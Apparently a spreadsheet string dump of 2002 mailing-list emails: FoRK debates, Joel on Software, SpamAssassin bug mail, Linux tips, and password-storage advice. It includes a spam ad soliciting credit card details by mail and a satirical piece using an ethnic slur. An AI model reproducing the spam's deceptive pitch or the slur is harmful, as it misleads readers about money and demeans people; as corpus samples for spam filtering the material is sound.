 Bureaucracy.  Libertarianism as implemented in North America is not 
 exactly the shining pinnacle of economic efficiency.
 Just try starting a telephone company in the US or (even worse) 
 Canada.  It can take a year or more to get the blessing of our own 
 "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
 socialist leaning Canada, Industry Canada and the CRTC).
 Yet, despite all of this intense regulation and paper pushing, as 
 well as regulatory scrutiny by the FTC, SEC, and IRS, the 
 executives of Telecom Companies have managed to bilk the investment 
 community for what looks to be tens of billions of dollars.  They 
 finished their routine with the a quadruple lutz -- laying off 
 hundreds of thousands of workers when it all came crashing down.
 So.. tell me again.. how are we better off?
 -Ian.
 On Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:
 &gt; The Mystery of Capital: Why Capitalism Triumphs in the West and Fails
 &gt; Everywhere Else -- by Hernando De Soto	
 &gt;
 &gt; Is something I'm reading now.
 &gt;
 &gt; My impression is that France is not anywhere near the "Permit Raj"
 &gt; nightmare that India is (and became).  Nor has its market been closed
 &gt; like India's has.
 &gt;
 &gt; But De Soto's work is perhaps just as important or more so.  He hasn't
 &gt; dealt specifically with India, but I recall examples from Peru,
 &gt; Philippines, and Egypt.  In Lima, his team took over a year (I think it
 &gt; was 2) working 8 hr days to legally register a 1 person company.  
 &gt; In the
 &gt; Philippines, getting legal title can take 20 years.  In Egypt, 
 &gt; about 80%
 &gt; of the population in Cairo lives in places where they are officially
 &gt; illegal.
 &gt;
 &gt; India hasn't been helped by its socialism.  Socialism has certainly
 &gt; helped strangle the country in permits.  But perhaps De Soto is right
 &gt; that the real crippling thing is keeping most of the people out of the
 &gt; legal, official property system.
 &gt;
 &gt; Putting most of the people in the property system was something 
 &gt; the west
 &gt; only finished about 100 years ago, or Japan did 50 years ago.  It 
 &gt; wasn't
 &gt; easy, but we live in a society that doesn't even remember we did it.
 &gt;
 &gt;
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Robert
 &gt;&gt; Harley
 &gt;&gt; Sent: Tuesday, August 20, 2002 11:24 AM
 &gt;&gt; To: fork@example.com
 &gt;&gt; Subject: Re: The Curse of India's Socialism
 &gt;&gt;
 &gt;&gt; RAH quoted:
 &gt;&gt;&gt; Indians are not poor because there are too many of them; they are
 &gt; poor
 &gt;&gt;&gt; because there are too many regulations and too much government
 &gt;&gt; intervention
 &gt;&gt;&gt; -- even today, a decade after reforms were begun. India's greatest
 &gt;&gt; problems
 &gt;&gt;&gt; arise from a political culture guided by socialist instincts on the
 &gt; one
 &gt;&gt;&gt; hand and an imbedded legal obligation on the other hand.
 &gt;&gt;
 &gt;&gt; Nice theory and all, but s/India/France/g and the statements hold just
 &gt;&gt; as true, yet France is #12 in the UN's HDI ranking, not #124.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;&gt; Since all parties must stand for socialism, no party espouses
 &gt;&gt;&gt; classical liberalism
 &gt;&gt;
 &gt;&gt; I'm not convinced that that classical liberalism is a good solution
 &gt;&gt; for countries in real difficulty.  See Joseph Stiglitz (Nobel for
 &gt;&gt; Economics) on the FMI's failed remedies.  Of course googling on
 &gt;&gt; "Stiglitz FMI" only brings up links in Spanish and French.  I guess
 &gt;&gt; that variety of spin is non grata in many anglo circles.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; R
 &gt;&gt; http://xent.com/mailman/listinfo/fork
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We're trying to decide if FogBUGZ 3.0 should support custom
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020912.html
 Date: Not supplied
 We're trying to decide if FogBUGZ[1] 3.0 should support custom fields. 
 Historically, I am opposed to custom fields in principle, because they get 
 abused. People add so many fields to their bug databases to capture everything 
 they think might be important that entering a bug is like applying to Harvard. 
 End result: people don't enter bugs, which is much, much worse than not 
 capturing all that information. You can always "page fault" to get the 
 information if the original report forgot it. Rather than having a field in 
 every bug where you enter the version numbers of every DLL on your machine 
 (this is an actual customer request), information which is likely to be 
 relevant only for a tiny percentage of bugs, why not just have the 
 programmer-assignee look at the bug first, and if they think it might be 
 dll-version-related, only _then_ bounce the bug back to the originator asking 
 for the DLL info? Similarly, it's always tempting to add a field in which you 
 ask for the OS version in which the bug occurred. This sounds logical, but 
 trust me: adding fields like this is guaranteed to do one thing and one thing 
 only: reduce the number of bug reports that get into the system in the first 
 place. Only a small percentage of bugs are really OS dependant and you can 
 always include that info in the text description of the bug if it happens to be 
 relevant. (But then how do you search for, say, all bugs which only happen on 
 Windows 98SE? Aha! You can't. Ever. Even with the custom field. Because not 
 every bug has been regressed on every version of every operating system, so 
 this search doesn't make sense in the first place. The info wasn't captured. Do 
 a full text search for 98SE and you'll find some of them. Life is imperfect.) 
 Life would be more perfect if every bug report included megabytes of 
 information -- a complete dump of every byte on the hard drive and in RAM on 
 the computer in question and while you're at it, a photograph of the tester's 
 workspace. But the goal of a bug tracking database is to _keep track of bugs_, 
 which, all else being equal, takes priority over making it easy to find them. I 
 have heard countless stories of development teams where the bug tracking 
 package was so high-ceremony that people were afraid to enter bugs in the 
 system, because they didn't know what all those fields were. The _real_ 
 bug-"tracking" happened in email, post-its, and hallway conversations. Great. 
 A pretty common question we get on the customer service line is, "does 
 FogBUGZ support custom fields?" Rather than giving our usual answer ("no. on 
 purpose.") over the last few weeks I've been saying, "can you please tell me 
 what fields you would need? We're trying to decide whether to implement that 
 feature in 3.0 and we want to know why people need it." The interesting thing 
 is, almost all of the fields people ask for _are already in FogBUGZ,_ and the 
 other ones, in my educated opinion, shouldn't be fields. And in fact, our 
 existing customers are certainly happy without custom fields. One of our 
 biggest site licenses was sold to a semiconductor company, and I myself wanted 
 to add a custom field for them to keep track of versions of the circuit design, 
 but I didn't, and they never needed it (even though they had been keeping track 
 of it with the old bug tracking package which had custom fields), and they are 
 happy and keep buying more site licenses. 
 But the dilemma for us is that many customers are evaluating bug tracking 
 software and they consider the lack of custom fields to be a major weakness in 
 our product. "Gosh, even Filemaker has custom fields." Righto. It's true. And 
 who am I to tell my customers they are wrong? One person who I was talking to 
 yesterday would have used a custom field for something that we already have a 
 built-in field for. This would have made their database confusing and 
 inconsistent and would have definitely caused more problems than it solved. But 
 it's still rude of me to tell customers that we don't have that feature _for 
 their own good_, even though it usually is, and we're losing some sales because 
 of it. 
 Sigh. I guess we could have a custom fields feature but hide it and make it so 
 hard to use that people don't use it. At least we won't lose any sales :)
 [1] http://www.fogcreek.com/FogBUGZ
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New toys
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/23.html#new_toys
 Date: 2002-09-23T16:50:42-05:00
 _Shelley Powers_: &amp;#8220;I thought the stuff this weekend on FOAF was a joke[1]
 &amp;#8212;a bunch of people playing with new toys. ... How does FOAF aid 
 aggregation? The author is included with each bit. Why do we need extraneous 
 material such as college, and who the author knows?&amp;#8221; 
 _Seth Russell_: &amp;#8220;For example I wanted to know who _you_ were[2]. Only 
 thing I had was your posts to this list. So i found "burningbird.net" in your 
 email address ... then i did a lot of reading over there. Still don't really 
 know who your are and what you are into, what projects you are working on, who 
 you know, and why you came here to run your mouth. But if there were a foaf 
 button on the feed from this channel, well I just click on that and i'm totally 
 into your stuff.&amp;#8221;
 [1] http://groups.yahoo.com/group/rss-dev/message/3981
 [2] http://groups.yahoo.com/group/rss-dev/message/3982
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] All Cap or Cap Word Subjects
</t>
  </si>
  <si>
    <t xml:space="preserve">Just curious if subject line capitalization can be used as an indicator.
 Either the percentage of characters that are caps..
 Or, percentage starting with a capital letter (if number of words &gt; xx)
 Brad Clements,                bkc@murkworks.com   (315)268-1000
 http://www.murkworks.com                          (315)268-9812 Fax
 AOL-IM: BKClements
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Russell Turpin wrote:
 &gt; Don't swallow too quickly what you have read about
 &gt; more traditional cultures, today or in the past. Do
 I don't swallow ;&gt;
 I was just offering anecdotal first-hand experiences from a number of
 cultures indicating 1) we apparently have a problem 2) which requires more
 than ad hoc hand-waving approach (it's trivial! it's obvious! all we have
 to do is XY!).
 &gt; we have any statistics on the poor man's divorce from
 &gt; centuries past? Are you so sure that the kids in 18th
 That's easy. Divorce didn't happen. The church and the society looked
 after that. Only relatively recently that privilege was granted to kings, 
 and only very recently to commoners.
 &gt; century England were any more "functional" than those
 &gt; today? What about 20th century Saudi Arabia?
 Is Saudi Arabia a meaningful emigration source?
 &gt; &gt;At least from the viewpoint of demographics sustainability and 
 &gt; &gt;counterpressure to gerontocracy and resulting innovatiophobia we're doing
 &gt; &gt;something wrong.
 &gt; 
 &gt; Granting your first two points, I'm skeptical about
 &gt; the last. Do you see ANY signs that America specifically
 I wasn't talking about the US specifically. (Though the demographics 
 problem exists there as well, albeit not in that extent we Eurotrash are 
 facing right now).
 &gt; or the west generally are suffering from lack of
 &gt; innovation, vis-a-vis youth nations such as Iran? The
 1) I'm seeing lack of innovation, and -- more disturbing -- trend towards
 even less innovation by an autocatalytic process (gerontocracy favors
 gerontocracy).
 &gt; last I read, the third generation of the revolution all
 &gt; (a) want to move to America, and (b) failing that, are
 &gt; importing everything they can American.
 My point was that the west, US first and foremost, importing innovation
 carriers and working against bad trend in the demographics by large scale
 import. While this kinda, sorta works on the short run, this is not
 something sustainable.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great email from the RIAA's Hillary Rosen to execs at Yahoo,
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:34:49AM
 Date: Wed, 25 Sep 2002 12:34:49 GMT
 Great email[1] from the RIAA's Hillary Rosen to execs at Yahoo, Real, AOL and 
 Microsoft, on how to crack down on the millions of Morpheus and Kazaa users. Is 
 this for real?
 [1] http://www.dotcomscoop.com/article.php?sid=40
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cd Rom 2000 How To Books
</t>
  </si>
  <si>
    <t xml:space="preserve">
 HELLO: THIS IS AN ADVERTISEMENT FOR THE PUBLISHERS
 CD-ROM, IF YOU HAVE NO INTEREST IN THIS INFORMATION, 
 PLEASE CLICK DELETE. THANK YOU.
 This exciting opportunity requires a very LOW START-UP COST 
 and has already been TESTED AND PROVEN.  
 We are in the information age, billions are made every year in the
 information industry and you can take part in making money by
 selling information.  We have available on CD-ROM 2000 
 HOW-TO BOOKS, REPORTS, AND MANUALS.
 The CD-ROM contains such categories as business, finance,
 government, health, mail order and much more.
 Some of the title's on the CD-ROM are.....
 how to make profits with 800#s, how to use the internet to make
 profits,how to beat depression, how to live a longer and healthier life,
 how to advertise,how to prepare a business plan, how to get a
 credit card, how to find work with the federal government, 
 how to write a winning resume, how to start a daycare,
 how to  raise money for your business, and much much more.
 The CD-ROM contains single page reports, 40 page manuals
 and 200 page books. You own the REPRINT, RESELL RIGHTS
 with the purchase of the CD-ROM. Not only can you use this
 wealth of information for your own benefit, you can also
 market this information to others. You can PRODUCE FOR
 PENNIES AND SELL FOR BIG DOLLARS.
 Remember this is an already
 TESTED AND PROVEN successful business opportunity!
 ACT NOW!!  REGULAR PRICE $59.95
 ORDER BEFORE AUG 12 AND RECEIVE FOR THE
 BONUS PRICE OF $15.95.
 Simply send $15.95 check, money order, or
 credit card information to:
 MARKETING RESOURCES
 PMB 179
 1812  S. HWY 77 # 115
 LYNN HAVEN, FL 32444 
 CREDIT CARD ORDERS, please mail in your information.
 Attention Marketing Resources, here is credit card
 information for the amount of $15.95 for the Publishers CD-ROM.
 ACCOUNT NUMBER________________________________
 EXP. DATE________________________
 NAME___________________________
 BILLING ADDRESS________________________________
 CITY_________________________STATE____________ZIP__________
 HOME PHONE NUMBER_____________________________
 ff we have reached you in error, and you would like to be removed
 stiylack@yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 486] SpamAssassin causes zombies (network tests,
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=486
 ------- Additional Comments From larry@5points.net  2002-09-10 08:45 -------
 Dan,
 To answer your question to my post (which maybe should be a seperate bug?) I'm 
 using Spamassassin version 2.30
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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Re: FWD: Florida Primary 2002: Back to the Future
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, it's nice to be back in America's flaccid state ...
 Seems like only yesterday we were suffering electile dysfunction ...
 Maybe if they made the ballot ovals look like little blue pills ...
 No, seriously ... I'm here all week ... You were great ...
 'nite everybody
</t>
  </si>
  <si>
    <t xml:space="preserve">Problem with spamtrap
 Could not lock /home/yyyy/lib/spamtrap/spam.mbox: File exists at lib/Mail/SpamAssassin/NoMailAudit.pm line 484, &lt;STDIN&gt; line 94.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Headline - Navel gazing wins an Ig Nobel
</t>
  </si>
  <si>
    <t xml:space="preserve">Geege Schuman wrote:
 &gt;"British scientists were honoured for research that found ostriches became
 &gt;more amorous with each other when a human was around. In fact, ostriches
 &gt;eventually started putting the moves on humans."
 &gt;
 &gt;this is true of manatees also.  you don't want to know.
 &gt;
 &gt;  
 &gt;
 So how much of it is due to jumping the inter-species boundary for 
 STATUS - i.e. I can fuck any of several
 reasonable candidates from my own species, or I can  be ambitious, and 
 go after the authority figure in the room.
 The alternative hypothesis is that its due to novelty, and then of 
 course, there's the "they'll fuck anything  given
 appropriate conditions." Hmmm, is this a potential intelligence test, 
 seeing as the last is a particularily human response?
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Sat, 20 Jul 2002 10:47:36 +0100
   | From: Stephen Shirley &lt;diamond@skynet.ie&gt;
   |[ ... ]
   | It's very easy to get one program to act on the output of a second
   | program: cmd1 | cmd2. But, what if you want cmd1 to act on the output
   | of cmd2 as well? Hmm. Eventually, I came up with this solution:
   | 
   |    mkfifo io
   |    cmd1 &lt;io | cmd2 &gt; io
   | 
   | and bingo, all was well with the world. Now, I have (and had) a sneaking
   | suspcion that it might be possible to do this without using a fifo, and
   | can be done using something like:
   | 
  1|    exec 3&gt;&amp;1
  2|    cmd1 &lt;&amp;3 | cmd2 &gt;&amp;3
  3|    exec 3&gt;&amp;-
   | 
   | but that doesn't work in that form, and i couldn't work out an
   | incantation that would. Anyone got any suggestions?  [ ... ]
  the above, or something close to it, would work if, when the
  1st line is executed, file descriptor (fdesc) 1 is open for both
  read and write (R/W) to a suitable entity (e.g., a pipe/FIFO; I
  imagine a socket or something of that ilk could be made to work
  but have no idea why you'd want to go to the trouble.... ).
  but in any case, all that is unlikely to be the case:
   · most probably, fdesc 1 is yer tty (e.g. screen + keyboard);
  and
   · quite possibly is open only for write (being stdout).
  you need it open for R/W because all dup2(2) --- which is all
  `n&gt;&amp;m' means -- does is replicate the fdesc handle.  it does not
  change the access mode; e.g., if the original fdesc (m) was only
  open for writing (W), that's all the new fdesc (n) is open for.
  yet in the 2nd line, it's needed for both R (cmd1) and W (cmd2).
  whilst it's impossible to say for certain from this excerpt, it
  seems a reasonable guess that fdesc 1 when the 1st line executes
  is the stdout of the script itself, which is most probably yer
  tty.  that means, if it does happen to be open for R/W (which is
  the case on some systems), `cmd2' would be writing to the screen
  whilst `cmd1' is reading from the keyboard --- i.e., the poor
  confused human luser is "clearly" expected to manually echo back
  to the computer what it prints.
  good luck!  ;-)
  upshot:  the FIFO is needed.  and this isn't a shell scripting
           problem per se.
  the FIFO solution is fine.  I've used variations (plural) on
  this approach to extend the Korn (ksh(1)) shell language, by
  providing a co-processing interpreter --- `ksh' sends certain
  predefined commands to the co-process, handling control over
  to the co-process until it indicates processing is complete
  and `ksh' can resume normal processing.  with some thought and
  care to insure signals do something rational, works great for
  adding a scripting language (which is the purpose) cheaply to
  script-less programs (useful when you can't modify the, IMHO,
  buggy program to use, e.g., TCL).
 cheers!
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Robert Harley:
 &gt; Gordon Mohr wrote:
 &gt; &gt;Definitional nit to pick:
 &gt; &gt;You've redefined "promiscuity" above as "total" or "average" activity,
 &gt; 
 &gt; I think it's clear that I'm talking about averages, so I'm not sure
 &gt; why that nit needs to be picked...
 It was clear you were talking about averages. But it should 
 be equally clear that that isn't what people mean when they
 use the word "promiscuity". 
 &gt; &gt;which seems to rob it of its common meaning: 
 &gt; &gt;activity above some specific threshold (usually "one") 
 &gt; 
 &gt; In that case, "promiscous" is a vacuous term in modern Western
 &gt; societies (but we knew that :), where people average 7 partners or so
 &gt; in their adult lives.
 Not at all. There are still people who only have one partner.
 There are many more whoe only have one partner over "long"
 periods of time. So it is far from "vacuous" to describe some
 people as "promiscuous" and others as "not promiscuous", 
 especially over a set period. ("He was promiscuous in college.
 He is no longer promiscuous.")
 The word has a clear meaning, despite your continuing tendency 
 to gloss that meaning over with population averages. 
 &gt; &gt;Consider a population of 3 males and 3 females.
 &gt; &gt;[...]
 &gt; &gt;so in this contrived population, females are more "promiscuous" than males,
 &gt; 
 &gt; So 1 girl gets 1 guy, 2 girls get 2 guys, 2 guys get 1 girl, 1 guy
 &gt; gets 3 girls.  Sounds like six of one versus half a dozen of the other
 &gt; to me.
 OK, then. Consider a population of 1,000,000. 500,000 men each
 pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
 also has sex with the other 499,999 women. 
 499,999 women have had more than one partner. 499,999 men have
 only had one partner. It is now "perfectly obvious" that in the
 common meaning of the term, among this contrived population, 
 that women are "more promiscuous" than men -- even though the
 single "most promiscuous" person, Wilt, is a man.  
 "Promiscuity" is not "exactly, perfectly identical between males 
 and females", except under a degenerate custom definition of
 "promiscuity".
 &gt; &gt;unless "promiscuity" is defined uselessly.
 &gt; 
 &gt; Ain't nothin' useless about averages.
 Averages are useful, sure -- but much more so if called by their 
 actual name, rather than conflated with another concept.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: US blueprint for smallpox mass-vaccination
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8171676,1440/
 Date: Not supplied
 Detailed guidelines for vaccinating all 288 million citizens within five days 
 of an outbreak are being dispatched to every state
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Jakma's [paul@clubi.ie] 67 lines of wisdom included:
 &gt; i thought the firewalling code on all the BSDs was fairly related -
 &gt; sorry. So FreeBSD's ipfw is not encumbered in the same way the old
 &gt; OBSD firewalling was?
 Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE
 is a stable branch of the code that has been rolled into -CURRENT
 first. It's basically a major release, that's still a work in
 progress)
 &gt; to an extent, i guess so, yes. but i've a few boxes with reasonable 
 &gt; uptimes that run netfilter/iptables. (i've one that has crashed twice 
 &gt; now after 60+ day uptimes. but that doesnt seem to be netfilter).
 &gt; 
 &gt; course, there's a lot more that can go wrong with a firewall than the
 &gt; firewall code. in that case get 2 boxes and heartbeat them.
 I don't really judge things by uptimes, it's rather like judging
 penis size. People like comparing them, and the larger they are, the
 more people are in awe of them, but overly large ones aren't really
 practical!
 &gt; indeed. couldnt agree more.
 &gt; 
 &gt; (that's the nice thing about *nix - fact we /can/ have nit-picking 
 &gt; arguments about which *nix and firewall code is better).
 Defiantely. I wouldn't like anyone to accuse me of being a
 nit-picker though ;)
 &gt; i've no experience of ipfw. (closest i've come is looking at IPFilter 
 &gt; for IRIX - but it had a problem in that it wasnt maintained 
 &gt; anymore. however, while the englishy syntax is nice, i dont think 
 &gt; iptables command &lt;args&gt; syntax is a big obstacle).
 &gt; 
 &gt; anyway.. there's choice. and as i understand it, with the advent of 
 &gt; netfilter/iptables there's now almost nothing between them from a 
 &gt; technical POV. (apart from ipfw being in use a lot longer).
 Well, as someone who's used ipchains quite heavily about two years
 ago, I can guarantee you that the learning curve for reading
 ipchains rules and ipfw rules is quite different. Of course once
 you've memorised (not necessarily sitting down with a sheet of them
 and learning them off by rote) them, you wonder what all the fuss is
 about before.
 It's not in itself a reason to choose one firewall product over
 another, but if that's all there is in the difference, and the
 learning curve for the Operating System is the same, then I know
 what I'd prefer, as a beginner.
 This is all getting rather off-topic now anyways, but since I've
 been doing quite a lot of work with ipfw over the last week I jumped
 on the bandwagon.
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [scoop] Scoop MS Word .doc file into something that plucker or other Palm app can display?
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day!
 On Thu, Aug 29, 2002 at 05:10:47PM -0400, Larry W. Virden wrote:
 &gt; I am wondering whether there's a way that I can use sitescooper and/or plucker
 &gt; or some other free utility to convert word documents into something a bit
 &gt; more palmos friendly?
 	You could try antiword (http://www.winfield.demon.nl/linux/).
 It's consoled based and converts word 6+ docs to text and some images to
 postscript and png.  You could also try openoffice and/or abiword if you
 have x installed.
 &gt; I don't have a Windows machine, so it becomes problematic to convert them;
 &gt; I know that if this were not the case, in Word I could save them as some
 &gt; other more friendly format.
 	Great! ;)
 Mabuhay! barryg
 -- 
 Barry Dexter A. Gonzaga, bofh
 barryg@kssp.upd.edu.ph 
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Sitescooper-talk mailing list
 Sitescooper-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: introductions
</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to claim the parenthood of desktop web services,
 but then there's a ton of people doing it now.  
 What I am the parent of is, Jackson Alan Bolcer--I just
 realized that the birth announcement was something that
 didn't get sent through due to my general laziness of
 being kicked off of FoRK from our stupid DNS fiasco
 mixed with the post filtering.   August 20th, 7lbs, 14oz,
 8:30pm.  
 Greg
 Geege Schuman wrote:
 &gt; 
 &gt; Aren't you Dr. Gregory A. Bolcer, Dutch Uncle of P2P?
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Gregory Alan Bolcer
 &gt; Sent: Saturday, September 14, 2002 10:21 AM
 &gt; To: FoRK
 &gt; Subject: introductions
 &gt; 
 &gt; As I've had to resubscribe to fork and fork-noarchive,
 &gt; I guess I have to reintroduce myself.  I'm formerly
 &gt; known as gbolcer at endtech dot com to the FoRK
 &gt; mailman program, formerly an overposter, and love
 &gt; soaking up bits through avid reading or scanning
 &gt; of almost every single list that's got informative to say.
 &gt; 
 &gt; Hopefully all those overpost will get cleared out at
 &gt; somepoint and fork-archived.
 &gt; 
 &gt; Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Storing passwords
</t>
  </si>
  <si>
    <t xml:space="preserve">If you need to store a database password, then
 clearly the first step is to store the text outside the
 web tree.  You can encrypt it and store the encryption key elsewhere,
 so that at least an attacker has to get two different things.
 Also, don't get full privileges - create a user account that
 is GRANTed very limited access.
 However, you can often do better than this if security
 is critical.  Create a separate program which has these
 database keys (as noted above), and make the web program
 contact IT.  Create a very limited protocol that ONLY
 lets you do the operations you need (you can add specific
 operations later).  There's a performance hit, which you're
 trading for improved data isolation.
 Giorgio Zoppi wrote:
 &gt; On Fri, Aug 23, 2002, David Wheeler wrote:
 &gt; 
 &gt; 
 &gt;&gt;The standard way to store passwords is... not to
 &gt;&gt;store passwords.  Instead, store a salted hash of
 &gt;&gt;the password in a database.  When you get a purported
 &gt;&gt;password, you re-salt it, compute the hash, and
 &gt;&gt;determine if they are the same.  This is how
 &gt;&gt;Unix has done it for years.  You want bigger hashes
 &gt;&gt;and salts than the old Unix systems, and you still want
 &gt;&gt;to prevent reading from those files (to foil password crackers).
 &gt;&gt;More info is in my book at:
 &gt;&gt;   http://www.dwheeler.com/secure-programs
 &gt;&gt;
 &gt; 
 &gt; Well...but this cannot be applied to database password, which most
 &gt; web apps use. The only solution I figure is store in clear outside web
 &gt; tree, any other ideas feasible?
 &gt; 
 &gt; Ciao,
 &gt; Giorgio.
 &gt; 
 &gt; --
 &gt; Never is Forever - deneb@penguin.it
 &gt; Homepage: http://www.cli.di.unipi.it/~zoppi/index.html
 &gt; --
 &gt; 
 &gt; 
 &gt; 
 -- 
 --- David A. Wheeler
      dwheeler@ida.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] weekend projects...
</t>
  </si>
  <si>
    <t xml:space="preserve">two seperate projects this weekend.  first mod_gzip which is an apache
 module to speed up serving static and dynamic mime(text/.*) web content.
 the second is the compaq smart array configs for linux.
 before i go on much more i'll cover the following bits: the server
 is running redhat 7.3 linux with all the updates on a compaq dl380.
 the client is running the same on a compaq laptop.  pretty much everything
 is stock redhat 7.3 - and i'm consciously trying to stick to that.
 ------------------------------------------------------------------------
 mod_gzip:
     there's a tutorial on linux.ie for it (thanks donnacha) but since i'm
     not an apache person this only got me part of the way.  step by step,
     this is what i did:
 	# cd /root
 	# wget http://www.remotecommunications.com/apache/mod_gzip/src/1.3.19.1a/mod_gzip.c.gz
 	# gunzip mod_gzip.c.gz
 	# apxs -ic mod_gzip.c
     that should compile and install fine, so add the following to
     your apache configs.  i've included comments to explain where they
     should go.  my apache config is split among many files (which is
     why i didn't use the -a flag to apxs).
 	# put this after the last LoadModule line
 	LoadModule gzip_module        /usr/lib/apache/mod_gzip.so
 	# put this after the last LoadModule line
 	AddModule mod_gzip.c
 	# this just needs to go below the obove two lines.
 	&lt;IfModule mod_gzip.c&gt;
 	    mod_gzip_on                         Yes
 	    mod_gzip_minimum_file_size          300
 	    mod_gzip_maximum_file_size          0
 	    mod_gzip_item_include               file    \.htm$
 	    mod_gzip_item_include               file    \.html$
 	    mod_gzip_item_include               file    \.txt$
 	    mod_gzip_item_include               file    \.php$
 	    mod_gzip_item_include               file    \.php3$
 	    mod_gzip_item_include               file    \.php4$
 	    mod_gzip_item_include               file    \.pl$
 	    mod_gzip_item_include               mime    text/.*
 	    mod_gzip_item_include               mime    httpd/unix-directory
 	    mod_gzip_item_include               handler ^perl-script$
 	    mod_gzip_item_include               handler ^server-status$
 	    mod_gzip_item_include               handler ^server-info$
 	    mod_gzip_item_exclude               file    \.css$
 	    mod_gzip_item_exclude               file    \.js$
 	    mod_gzip_item_exclude               mime    ^image/.*
 	    mod_gzip_dechunk                    yes
 	    # mod_gzip_min_http                 1000
 	    mod_gzip_temp_dir                   /tmp
 	    mod_gzip_keep_workfiles             No
 	    LogFormat "%h \"%f\" %{mod_gzip_result}n %{mod_gzip_input_size}n %{mod_gzip_output_size}n %{mod_gzip_compression_ratio}npct." mod_gzip_logs
 	    CustomLog logs/compression_log mod_gzip_logs
 	&lt;/IfModule&gt;
     finally, poke apache:
 	# service httpd reload
     and after you've viewed some pages and check
     /var/log/httpd/compression_log in order to see if it's working.
     if you have /server-info avilable you should see that mod_gzip
     is loaded.  a compressed line and a non-compressed line might look
     like this:
 	roo "/.../ssl_glossary.html" OK 15092 4726 69pct.
 	roo "/.../ssl_template.head-num-7.gif" DECLINED:EXCLUDED 0 0 0pct.
 ------------------------------------------------------------------------
 compaq smart array config:   (WARNING: YOU NEED A JVM FOR YOUR BROWSER)
     i searched on google for "compaq smart array configuration linux" and
     got a slew of hits.  one of them was a click away from this page:
 	http://www.compaq.com/support/files/server/us/download/14703.html
     i downloaded the rpm.  installed it. and ran the server per the
     instructions.  note, the -R enables remote connections.  if you're
     running the browser locally, run it without the -R and connect
     to localhost.
 	cpqacuxe -R
     i found that galeon didn't work.  mozilla did.  i suspect it's because
     pop-ups are disabled in galeon config, but i might be wrong.  it uses
     java which is slow and memory hungry on this laptop.  feel free to
     try galeon with pop-ups enabled if you want to.
     so, point mozilla at http://yourserver:2301/ .  login as
     administrator/administrator and change your password.  then go back
     to the main page and click the little drive array graphic towards
     the bottom.  configure your array as you want (i had to add a disk).
     save your changes, and exit.  to stop the server, just do this:
 	cpqacuxe -stop
     in my case the drive was now accessible.  i started the process of
     making the file systems by partitioning the drive.  i knew what
     it would be called, but a grep for ida on the output of dmesg
     confirmed it.
 	fdisk /dev/ida/c0d1
     and from there i built the filesystems and so on.
 hope this helps some folks,
 kevin
 -- 
 Kevin Lyda - kevin@doolin.com
 Lead Programmer
 Doolin Technologies
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: W3C approves HTML 4 'emotitags' - Now you'll be able to say it with feeling
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.therockalltimes.co.uk/2002/04/08/new-tags.html
 W3C approves HTML 4 'emotitags' - Now you'll be able to say it with
 feeling
 by Lester Haines
 The World Wide Web Consortium (W3C) has approved a number of new html
 'emotitags' which will revolutionise the web surfing experience.
 The tags have no physical effect, but rather elicit a strong emotional
 response from the reader. Top of the list is &lt;wot&gt; (War on TerrorT). The
 tag, when judiciously applied, will immediately provoke violent anger
 against ragheads, thus:
